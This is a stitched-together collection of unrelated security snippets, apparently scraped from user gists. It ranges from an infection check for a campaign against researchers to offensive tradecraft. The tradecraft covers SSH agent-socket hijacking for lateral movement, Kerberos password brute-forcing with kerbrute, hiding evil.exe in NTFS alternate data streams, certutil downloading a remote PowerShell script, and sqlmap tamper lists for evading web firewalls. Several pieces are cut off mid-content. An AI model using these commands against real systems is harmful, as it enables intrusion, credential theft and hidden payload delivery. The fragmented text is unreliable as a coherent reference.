mpgn

# https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# https://twitter.com/richinseattle/status/1354296177743679489

# if true on powershell command or no error on reg query output you are infected !

reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
[System.IO.File]::Exists('C:\Windows\System32\Nwsapagent.sys')
[System.IO.File]::Exists('C:\Windows\System32\helpsvc.sys')

int0x80

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

AkiJos

#!/usr/bin/env python3

# My attempt to create a spoofing IP address using RAW sockets, i know it can be done using scapy 
# but wanted to create it using RAW socket. 
# Feedbacks/improvements are welcome :)

#Author: B31212Y

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

marduc812

#!/bin/bash

# Path for the Forward DNS records zip
source="/root/Downloads/2019-01-25-1548374703-fdns_any.json.gz" 

# Input with dot in front
in=.$1

#Check if JQ is installed
if hash jq 2>/dev/null; then

jhaddix

.
..
........
@
*
*.*
*.*.*
🐎

thesubtlety

Product Security Testing

• IDA Pro and Decompilers Website
• Software Security Testing
• Introduction to Risk Analysis
• Introduction to Fuzzing
• The Art Of Software Security Assessment", by Mark Dowd, McDonald, Schuh, 2006
  • *Not on the recommended list, but a useful resource

Crypto

• *Not on the recommended lists, but I think SANS would be better off having students just work on these all day

jhaddix

`
~/
~
ים
   
 
___
__
_

api0cradle

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

sapran

# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```